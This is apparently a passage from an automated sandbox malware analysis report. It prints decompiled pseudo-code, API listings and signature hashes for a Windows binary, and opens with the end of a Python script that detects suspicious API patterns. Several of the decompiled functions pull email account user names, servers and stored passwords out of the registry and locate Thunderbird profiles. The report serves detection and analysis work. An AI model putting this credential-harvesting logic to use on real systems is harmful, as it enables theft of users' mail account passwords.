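        elif c.api.startswith("RegDeleteKey") and c.args and decode_hkey(c.args[0]) == "HKEY_CURRENT_USER":
            found["hkcu_key_deleted"].append(c.ref)
        elif c.api.startswith("GetTempPath"):
            found["temp_path_resolved"].append(c.ref)
    return found


def is_suspicious(indicators: dict[str, list[int]]) -> bool:
    """Editor's threshold: all three indicators present in the same function."""
    return all(indicators.values())


# Copied from the API listing of the function above.
SAMPLE_LISTING = """\
• Part of subcall function 00407D23: LoadMenuA.USER32 ref: 00407D2B
• SetMenu.USER32(?,00000000), ref: 0040A9C1
• #6.COMCTL32(50000000,0041344F,?,00000101), ref: 0040A9DC
• LoadImageA.USER32 ref: 0040AA0A
• _stricmp.MSVCRT(0041344F,/noloadsettings), ref: 0040AB31
• RegDeleteKeyA.ADVAPI32(80000001,0041344F), ref: 0040AB46
• GetFileAttributesA.KERNEL32(00418660), ref: 0040AB85
• GetTempPathA.KERNEL32(00000104,00418660), ref: 0040AB95
• RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AC06
"""

if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE_LISTING)
    hits = headless_tool_indicators(parsed)
    for name, refs in hits.items():
        print(f"{name:22s} {', '.join(f'{r:08X}' for r in refs) or '-'}")
    print("suspicious:", is_suspicious(hits))
```

The parser keeps `?` placeholders as literal arguments, so `decode_hkey` does not raise when the sandbox failed to recover the registry root; the same `parse_api_listing` can be pointed at the API listing of any other function in this report to compare call patterns across the dumped image.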
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
                                                                                                                                                                  • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                  • API String ID: 873469642-933021314
                                                                                                                                                                  • Opcode ID: f75555cb15c1b63825adbd58fa812571469ae2ca081b8c073a2cdb6d326835af
                                                                                                                                                                  • Instruction ID: e1998a72efec4b56c1f9895f5ce6fdd1159dce7011e853ef75bd655fd4d55b37
                                                                                                                                                                  • Opcode Fuzzy Hash: f75555cb15c1b63825adbd58fa812571469ae2ca081b8c073a2cdb6d326835af
                                                                                                                                                                  • Instruction Fuzzy Hash: DBB10071644388EFEB16CF74C845BDABFB5BF14304F00406AF644A7292C7B9A954CB5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 35%
E004025C5(void* __ecx, void* __fp0) {
	void* __esi;
	void* _t58;
	void* _t59;
	void* _t67;
	void* _t70;
	void* _t73;
	void* _t87;
	signed int _t90;
	void* _t92;
	signed int _t96;
	intOrPtr _t100;
	intOrPtr _t101;
	void* _t103;
	void* _t105;
	void* _t106;
	void* _t108;
	void* _t114;

	_t114 = __fp0;
	_t92 = __ecx;
	_t103 = _t105 - 0x6c;
	_t106 = _t105 - 0x474;
	 *(_t103 + 0x4c) = "POP3 User Name";
	 *(_t103 + 0x50) = "IMAP User Name";
	 *(_t103 + 0x54) = "HTTPMail User Name";
	 *(_t103 + 0x58) = "SMTP USer Name";
	 *(_t103 + 0x1c) = "POP3 Server";
	 *(_t103 + 0x20) = "IMAP Server";
	 *(_t103 + 0x24) = "HTTPMail Server";
	 *(_t103 + 0x28) = "SMTP Server";
	 *(_t103 + 0x3c) = "POP3 Password2";
	 *(_t103 + 0x40) = "IMAP Password2";
	 *(_t103 + 0x44) = "HTTPMail Password2";
	 *(_t103 + 0x48) = "SMTP Password2";
	 *(_t103 + 0x2c) = "POP3 Port";
	 *(_t103 + 0x30) = "IMAP Port";
	 *(_t103 + 0x34) = "HTTPMail Port";
	 *(_t103 + 0x38) = "SMTP Port";
	 *(_t103 + 0x5c) = "POP3 Secure Connection";
	 *(_t103 + 0x60) = "IMAP Secure Connection";
	 *(_t103 + 0x64) = "HTTPMail Secure Connection";
	 *(_t103 + 0x68) = "SMTP Secure Connection";
	_t90 = 0;
	do {
		 *(_t103 - 0x64) = 0;
		memset(_t103 - 0x63, 0, 0x7f);
		_push(_t103 - 0x64);
		_t96 = _t90 << 2;
		_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
		_push( *((intOrPtr*)(_t103 + 0x78)));
		_t58 = 0x7f;
		_t59 = E0040F1F1(_t58, _t92);
		_t106 = _t106 + 0x18;
		if(_t59 == 0) {
			E00402197(_t103 - 0x408);
			strcpy(_t103 - 0x1f4, _t103 - 0x64);
			_t100 =  *((intOrPtr*)(_t103 + 0x78));
			 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
			_t34 = _t90 + 1; // 0x1
			 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
			_push(_t103 - 0x2f8);
			_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
			_push(_t100);
			_t67 = 0x7f;
			E0040F1F1(_t67, _t92);
			_push(_t103 - 0x3fc);
			_push("SMTP Display Name");
			_push(_t100);
			_t70 = 0x7f;
			E0040F1F1(_t70, _t92);
			_push(_t103 - 0x378);
			_push("SMTP Email Address");
			_push(_t100);
			_t73 = 0x7f;
			E0040F1F1(_t73, _t92);
			_t108 = _t106 + 0x2c;
			if(_t90 != 3) {
				_push(_t103 - 0x278);
				_push("SMTP Server");
				_push(_t100);
				_t87 = 0x7f;
				E0040F1F1(_t87, _t92);
				_t108 = _t108 + 0xc;
			}
			E0040F1CA(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
			E0040F1CA(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
			_t106 = _t108 + 0x18;
			_t101 =  *((intOrPtr*)(_t103 + 0x74));
			E0040242B(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
			strcpy(_t103 - 0xf4, _t101 + 0xa9c);
			_pop(_t92);
			_t59 = E004023C6(_t103 - 0x408, _t114, _t101);
		}
		_t90 = _t90 + 1;
	} while (_t90 < 4);
	return _t59;
}


                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040266D
                                                                                                                                                                    • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,7479ED80,?,00000000), ref: 004026AB
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 00402768
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcpy$QueryValuememset
                                                                                                                                                                  • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                  • API String ID: 3373037483-1627711381
                                                                                                                                                                  • Opcode ID: e3f80b658476a1f582484f23fef2e1cdc73789c59224b923ecc992e764de9bf2
                                                                                                                                                                  • Instruction ID: 73c24e987151304ffccade67a91af9495e30ddb8d36a1dc6faba254672d7bb93
                                                                                                                                                                  • Opcode Fuzzy Hash: e3f80b658476a1f582484f23fef2e1cdc73789c59224b923ecc992e764de9bf2
                                                                                                                                                                  • Instruction Fuzzy Hash: 534143B190021CBEDB31DF51CD49ADE7BA8AF04348F50457BF918A7291D3799A88CF98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                  			E0040278F(void* __fp0) {
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t66;
                                                                                                                                                                  				signed int _t95;
                                                                                                                                                                  				void* _t98;
                                                                                                                                                                  				intOrPtr _t107;
                                                                                                                                                                  				void* _t109;
                                                                                                                                                                  				void* _t111;
                                                                                                                                                                  				void* _t112;
                                                                                                                                                                  				void* _t119;
                                                                                                                                                                  
                                                                                                                                                                  				_t119 = __fp0;
                                                                                                                                                                  				_t109 = _t111 - 0x70;
                                                                                                                                                                  				_t112 = _t111 - 0x474;
                                                                                                                                                                  				 *(_t109 + 0x40) = "POP3 Password";
                                                                                                                                                                  				 *(_t109 + 0x44) = "IMAP Password";
                                                                                                                                                                  				 *(_t109 + 0x48) = "HTTP Password";
                                                                                                                                                                  				 *(_t109 + 0x4c) = "SMTP Password";
                                                                                                                                                                  				 *(_t109 + 0x50) = "POP3 User";
                                                                                                                                                                  				 *(_t109 + 0x54) = "IMAP User";
                                                                                                                                                                  				 *(_t109 + 0x58) = "HTTP User";
                                                                                                                                                                  				 *(_t109 + 0x5c) = "SMTP User";
                                                                                                                                                                  				 *(_t109 + 0x20) = "POP3 Server";
                                                                                                                                                                  				 *(_t109 + 0x24) = "IMAP Server";
                                                                                                                                                                  				 *(_t109 + 0x28) = "HTTP Server URL";
                                                                                                                                                                  				 *(_t109 + 0x2c) = "SMTP Server";
                                                                                                                                                                  				 *(_t109 + 0x30) = "POP3 Port";
                                                                                                                                                                  				 *(_t109 + 0x34) = "IMAP Port";
                                                                                                                                                                  				 *(_t109 + 0x38) = "HTTP Port";
                                                                                                                                                                  				 *(_t109 + 0x3c) = "SMTP Port";
                                                                                                                                                                  				 *(_t109 + 0x60) = "POP3 Use SPA";
                                                                                                                                                                  				 *(_t109 + 0x64) = "IMAP Use SPA";
                                                                                                                                                                  				 *(_t109 + 0x68) = "HTTPMail Use SSL";
                                                                                                                                                                  				 *(_t109 + 0x6c) = "SMTP Use SSL";
                                                                                                                                                                  				_t95 = 0;
                                                                                                                                                                  				do {
                                                                                                                                                                  					 *(_t109 - 0x60) = 0;
                                                                                                                                                                  					memset(_t109 - 0x5f, 0, 0x7f);
                                                                                                                                                                  					_t112 = _t112 + 0xc;
                                                                                                                                                                  					_t103 = _t95 << 2;
                                                                                                                                                                  					_t66 = E00402963(_t109 - 0x60,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + (_t95 << 2) + 0x50)));
                                                                                                                                                                  					if(_t66 != 0) {
                                                                                                                                                                  						E00402197(_t109 - 0x404);
                                                                                                                                                                  						strcpy(_t109 - 0x1f0, _t109 - 0x60);
                                                                                                                                                                  						_t107 =  *((intOrPtr*)(_t109 + 0x78));
                                                                                                                                                                  						_pop(_t98);
                                                                                                                                                                  						 *((intOrPtr*)(_t109 - 0x378)) =  *((intOrPtr*)(_t107 + 0xb1c));
                                                                                                                                                                  						_t37 = _t95 + 1; // 0x1
                                                                                                                                                                  						 *((intOrPtr*)(_t109 - 0x1f4)) = _t37;
                                                                                                                                                                  						E00402963(_t109 - 0x2f4,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x20)));
                                                                                                                                                                  						E00402963(_t109 - 0x3f8,  *((intOrPtr*)(_t109 + 0x7c)), "Display Name");
                                                                                                                                                                  						E00402963(_t109 - 0x374,  *((intOrPtr*)(_t109 + 0x7c)), "Email");
                                                                                                                                                                  						if(_t95 != 3) {
                                                                                                                                                                  							E00402963(_t109 - 0x274,  *((intOrPtr*)(_t109 + 0x7c)), "SMTP Server");
                                                                                                                                                                  							E0040F1CA(_t98,  *((intOrPtr*)(_t109 + 0x7c)), "SMTP Port", _t109 - 0x68);
                                                                                                                                                                  							_t112 = _t112 + 0xc;
                                                                                                                                                                  						}
                                                                                                                                                                  						E0040F1CA(_t98,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x30)), _t109 - 0x70);
                                                                                                                                                                  						E0040F1CA(_t98,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x60)), _t109 - 0x6c);
                                                                                                                                                                  						_t112 = _t112 + 0x18;
                                                                                                                                                                  						E0040242B(_t107, _t98,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x40)), _t109 - 0x170, 1);
                                                                                                                                                                  						strcpy(_t109 - 0xf0, _t107 + 0xa9c);
                                                                                                                                                                  						_t66 = E004023C6(_t109 - 0x404, _t119, _t107);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t95 = _t95 + 1;
                                                                                                                                                                  				} while (_t95 < 4);
                                                                                                                                                                  				return _t66;
                                                                                                                                                                  			}

                                                                                                                                                                  Instruction addresses for E0040278F: 0x0040278f, 0x00402790, 0x00402794, 0x0040279d, 0x004027a4, 0x004027ab, 0x004027b2, 0x004027b9, 0x004027c0, 0x004027c7, 0x004027ce, 0x004027d5, 0x004027dc, 0x004027e3, 0x004027ea, 0x004027f1, 0x004027f8, 0x004027ff, 0x00402806, 0x0040280d, 0x00402814, 0x0040281b, 0x00402822, 0x00402829, 0x0040282b, 0x00402833, 0x00402837, 0x0040283c, 0x00402841, 0x0040284e, 0x00402855, 0x00402861, 0x00402871, 0x00402876, 0x00402880, 0x00402885, 0x0040288e, 0x00402891, 0x0040289d, 0x004028b0, 0x004028c3, 0x004028cb, 0x004028db, 0x004028ec, 0x004028f1, 0x004028f1, 0x004028ff, 0x0040290f, 0x00402914, 0x00402929, 0x0040293c, 0x0040294a, 0x0040294a, 0x0040294f, 0x00402950, 0x00402960

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00402837
                                                                                                                                                                    • Part of subcall function 00402963: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 00402994
                                                                                                                                                                  • strcpy.MSVCRT(?,?,7479ED80,?,00000000), ref: 00402871
                                                                                                                                                                    • Part of subcall function 00402963: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029C2
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,7479ED80,?,00000000), ref: 0040293C
                                                                                                                                                                    • Part of subcall function 0040F1CA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402904,?,?,?,?,00402904,?,?), ref: 0040F1E9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValuestrcpy$ByteCharMultiWidememset
                                                                                                                                                                  • String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                  • API String ID: 1302727986-4086712241
                                                                                                                                                                  • Opcode ID: 832ecfa302c2265efd1f56203e1d837ddfbcb2d0fb3c2068bcbc5ca0dd018d8a
                                                                                                                                                                  • Instruction ID: 308be4cc5b828d0a3e021f21c5187f9384b0cc6d4098b7245e54e25f5b72303c
                                                                                                                                                                  • Opcode Fuzzy Hash: 832ecfa302c2265efd1f56203e1d837ddfbcb2d0fb3c2068bcbc5ca0dd018d8a
                                                                                                                                                                  • Instruction Fuzzy Hash: D9410BB150024DABCF21EF61DD499DD7BA9FF04309F10816BF92466291D3B99A89CF48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 81%
                                                                                                                                                                  			E0040FAA6(CHAR* __eax) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				void _v267;
                                                                                                                                                                  				char _v268;
                                                                                                                                                                  				void _v531;
                                                                                                                                                                  				char _v532;
                                                                                                                                                                  				void _v787;
                                                                                                                                                                  				char _v788;
                                                                                                                                                                  				void _v1051;
                                                                                                                                                                  				char _v1052;
                                                                                                                                                                  				void _v2075;
                                                                                                                                                                  				char _v2076;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t45;
                                                                                                                                                                  				void* _t59;
                                                                                                                                                                  				char* _t60;
                                                                                                                                                                  				char* _t71;
                                                                                                                                                                  				char* _t75;
                                                                                                                                                                  				void* _t84;
                                                                                                                                                                  				CHAR* _t89;
                                                                                                                                                                  				void* _t90;
                                                                                                                                                                  				void* _t91;
                                                                                                                                                                  				void* _t92;
                                                                                                                                                                  				void* _t93;
                                                                                                                                                                  
                                                                                                                                                                  				_t89 = __eax;
                                                                                                                                                                  				_v1052 = 0;
                                                                                                                                                                  				memset( &_v1051, 0, 0x104);
                                                                                                                                                                  				_v788 = 0;
                                                                                                                                                                  				memset( &_v787, 0, 0xff);
                                                                                                                                                                  				 *_t89 = 0;
                                                                                                                                                                  				_t45 = E0040F1B0(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
                                                                                                                                                                  				_t91 = _t90 + 0x24;
                                                                                                                                                                  				if(_t45 != 0) {
                                                                                                                                                                  					L12:
                                                                                                                                                                  					strcpy(_t89,  &_v1052);
                                                                                                                                                                  					if( *_t89 == 0) {
                                                                                                                                                                  						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
                                                                                                                                                                  						if(E0040FA2B(_t89) == 0) {
                                                                                                                                                                  							 *_t89 = 0;
                                                                                                                                                                  						}
                                                                                                                                                                  						if( *_t89 == 0) {
                                                                                                                                                                  							E0040617C(_t89);
                                                                                                                                                                  							if(E0040FA2B(_t89) == 0) {
                                                                                                                                                                  								 *_t89 = 0;
                                                                                                                                                                  							}
                                                                                                                                                                  							if( *_t89 == 0) {
                                                                                                                                                                  								GetCurrentDirectoryA(0x104, _t89);
                                                                                                                                                                  								if(E0040FA2B(_t89) == 0) {
                                                                                                                                                                  									 *_t89 = 0;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					return 0 |  *_t89 != 0x00000000;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_v268 = 0;
                                                                                                                                                                  					memset( &_v267, 0, 0xff);
                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                  					_t59 = E0040F276(_v8, 0,  &_v268);
                                                                                                                                                                  					_t92 = _t91 + 0x18;
                                                                                                                                                                  					while(_t59 == 0) {
                                                                                                                                                                  						_push(7);
                                                                                                                                                                  						_t60 =  &_v268;
                                                                                                                                                                  						_push("mozilla");
                                                                                                                                                                  						_push(_t60);
                                                                                                                                                                  						L00412114();
                                                                                                                                                                  						_t93 = _t92 + 0xc;
                                                                                                                                                                  						if(_t60 == 0) {
                                                                                                                                                                  							_v532 = 0;
                                                                                                                                                                  							memset( &_v531, 0, 0x104);
                                                                                                                                                                  							_v2076 = 0;
                                                                                                                                                                  							memset( &_v2075, 0, 0x3ff);
                                                                                                                                                                  							_push( &_v268);
                                                                                                                                                                  							_push("%s\\bin");
                                                                                                                                                                  							_push(0x3ff);
                                                                                                                                                                  							_push( &_v2076);
                                                                                                                                                                  							L00412108();
                                                                                                                                                                  							E0040F232(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
                                                                                                                                                                  							_t71 =  &_v532;
                                                                                                                                                                  							_push(0x5c);
                                                                                                                                                                  							_push(_t71);
                                                                                                                                                                  							L0041210E();
                                                                                                                                                                  							_t93 = _t93 + 0x44;
                                                                                                                                                                  							if(_t71 != 0) {
                                                                                                                                                                  								 *_t71 = 0;
                                                                                                                                                                  							}
                                                                                                                                                                  							if(_v532 != 0 && E0040FA2B( &_v532) != 0) {
                                                                                                                                                                  								_push( &_v788);
                                                                                                                                                                  								_t75 =  &_v268;
                                                                                                                                                                  								L0041207E();
                                                                                                                                                                  								_t84 = _t75;
                                                                                                                                                                  								if(_t75 > 0) {
                                                                                                                                                                  									strcpy( &_v1052,  &_v532);
                                                                                                                                                                  									strcpy( &_v788,  &_v268);
                                                                                                                                                                  									_t93 = _t93 + 0x10;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						_v12 = _v12 + 1;
                                                                                                                                                                  						_t59 = E0040F276(_v8, _v12,  &_v268);
                                                                                                                                                                  						_t92 = _t93 + 0xc;
                                                                                                                                                                  					}
                                                                                                                                                                  					RegCloseKey(_v8);
                                                                                                                                                                  					goto L12;
                                                                                                                                                                  				}
                                                                                                                                                                  			}
0x0040faba
0x0040fac4
0x0040faca
0x0040fadc
0x0040fae2
0x0040faf5
0x0040faf7
0x0040fafc
0x0040fb01
0x0040fc57
0x0040fc5f
0x0040fc68
0x0040fc71
0x0040fc7f
0x0040fc81
0x0040fc81
0x0040fc85
0x0040fc87
0x0040fc94
0x0040fc96
0x0040fc96
0x0040fc9a
0x0040fc9e
0x0040fcac
0x0040fcae
0x0040fcae
0x0040fcac
0x0040fc9a
0x0040fc85
0x0040fcbb
0x0040fb07
0x0040fb14
0x0040fb1a
0x0040fb2a
0x0040fb2d
0x0040fb32
0x0040fc46
0x0040fb3a
0x0040fb3c
0x0040fb42
0x0040fb47
0x0040fb48
0x0040fb4d
0x0040fb52
0x0040fb61
0x0040fb67
0x0040fb79
0x0040fb7f
0x0040fb8a
0x0040fb8b
0x0040fb96
0x0040fb9b
0x0040fb9c
0x0040fbb8
0x0040fbbd
0x0040fbc3
0x0040fbc5
0x0040fbc6
0x0040fbcb
0x0040fbd0
0x0040fbd2
0x0040fbd2
0x0040fbda
0x0040fbf2
0x0040fbf3
0x0040fbfa
0x0040fc02
0x0040fc03
0x0040fc13
0x0040fc26
0x0040fc2b
0x0040fc2b
0x0040fc03
0x0040fbda
                                                                                                                                                                  0x0040fc2e
                                                                                                                                                                  0x0040fc3e
                                                                                                                                                                  0x0040fc43
                                                                                                                                                                  0x0040fc43
                                                                                                                                                                  0x0040fc51
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fc51

APIs
• memset.MSVCRT ref: 0040FACA
• memset.MSVCRT ref: 0040FAE2
  • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
• memset.MSVCRT ref: 0040FB1A
  • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
• _mbsnbicmp.MSVCRT ref: 0040FB48
• memset.MSVCRT ref: 0040FB67
• memset.MSVCRT ref: 0040FB7F
• _snprintf.MSVCRT ref: 0040FB9C
• _mbsrchr.MSVCRT ref: 0040FBC6
• _mbsicmp.MSVCRT ref: 0040FBFA
• strcpy.MSVCRT(?,?,?), ref: 0040FC13
• strcpy.MSVCRT(?,?,?,?,?), ref: 0040FC26
• RegCloseKey.ADVAPI32(0040FD0A), ref: 0040FC51
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FC5F
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040FC71
• GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FC9E
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
• String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
• API String ID: 3269028891-3267283505
• Opcode ID: 2db57c62c4330eedb1a8fe20c988d36466374da2882950982c509ff309ff3e93
• Instruction ID: 1ceab4daf47746688ac62aede77486c23684b0aa94ce4f67dad83c1e3abd437f
• Opcode Fuzzy Hash: 2db57c62c4330eedb1a8fe20c988d36466374da2882950982c509ff309ff3e93
• Instruction Fuzzy Hash: 3851C67194515DBEDB31E7A18D42EDB7BACAF14304F0004FAB684F2141EA789FC98B69
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
			/* Decompiled helper: wraps the text in _a8 with HTML font/bold tags and writes
			   the result into the caller-supplied buffer _a4. __edi points to a style
			   record: +4 = colour (0xffffffff means "no colour"), +8 = font size
			   (<= 0 means "no size"), +0xc = bold flag. Returns _a4. */
			char* E0040F797(void* __edi, char* _a4, char* _a8) {
				int _v8;                 /* 1 if a <font ...> wrapper is emitted at all */
				void _v263;              /* _v264.._v263 together form a 255-byte scratch buffer */
				char _v264;
				void _v519;              /* _v520.._v519 together form a 255-byte colour-string buffer */
				char _v520;
				intOrPtr _t32;
				intOrPtr _t33;           /* was used below without a declaration in the raw decompiler output */
				void* _t58;
				char* _t60;
				void* _t61;
				void* _t62;

				_t58 = __edi;
				/* zero both local buffers (first byte, then the remaining 0xfe bytes) */
				_v264 = 0;
				memset( &_v263, 0, 0xfe);
				_v520 = 0;
				memset( &_v519, 0, 0xfe);
				_t62 = _t61 + 0x18;
				/* no colour and no size: skip the <font> wrapper entirely */
				_v8 = 1;
				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
					_v8 = 0;
				}
				_t60 = _a4;
				 *_t60 = 0;
				if(_v8 != 0) {
					strcpy(_t60, "<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						sprintf( &_v264, " size=\"%d\"", _t32);
						strcat(_t60,  &_v264);
						_t62 = _t62 + 0x14;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						/* E0040F6E2 formats the colour value as a hex string into _v520 */
						sprintf( &_v264, " color=\"#%s\"", E0040F6E2(_t33,  &_v520));
						strcat(_t60,  &_v264);
					}
					strcat(_t60, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "<b>");
				}
				strcat(_t60, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "</b>");
				}
				if(_v8 != 0) {
					strcat(_t60, "</font>");
				}
				return _t60;
			}

APIs
• memset.MSVCRT ref: 0040F7B8
• memset.MSVCRT ref: 0040F7CC
• strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F7F9
• sprintf.MSVCRT ref: 0040F814
• strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F821
• sprintf.MSVCRT ref: 0040F84B
• strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F858
• strcat.MSVCRT(?,00414E74,?,?,?,?,?), ref: 0040F866
• strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F878
• strcat.MSVCRT(?,004097A4,?,?,?,?,?), ref: 0040F883
• strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F895
• strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F8A7
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: strcat$memsetsprintf$strcpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 1662040868-1996832678
• Opcode ID: 8a1c3a32b9a96c7bd47b9f04c68cff8eaed577a3d3a668b2d7b8b90f51614222
• Instruction ID: 1d89f71d6803e1250473f580c1fd87552222ed23aec69fbe6c7d3cec9cc88889
• Opcode Fuzzy Hash: 8a1c3a32b9a96c7bd47b9f04c68cff8eaed577a3d3a668b2d7b8b90f51614222
• Instruction Fuzzy Hash: C731E673905714AEC720AA659D42DCBB76CAF14324F1082BFF214A2182D7BC9AD4CA9D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
                                                                                                                                                                  			E0040B031(void* __eax, intOrPtr _a4) {
                                                                                                                                                                  				char _v271;
                                                                                                                                                                  				char _v532;
                                                                                                                                                                  				intOrPtr _v536;
                                                                                                                                                                  				char _v540;
                                                                                                                                                                  				void _v803;
                                                                                                                                                                  				char _v804;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				char* _t47;
                                                                                                                                                                  				intOrPtr _t67;
                                                                                                                                                                  				WINDOWPLACEMENT* _t73;
                                                                                                                                                                  				void* _t75;
                                                                                                                                                                  				char* _t83;
                                                                                                                                                                  				struct HWND__* _t84;
                                                                                                                                                                  				intOrPtr _t88;
                                                                                                                                                                  				int _t90;
                                                                                                                                                                  
                                                                                                                                                                   				_t75 = __eax;                                                                      // 0x0040b043
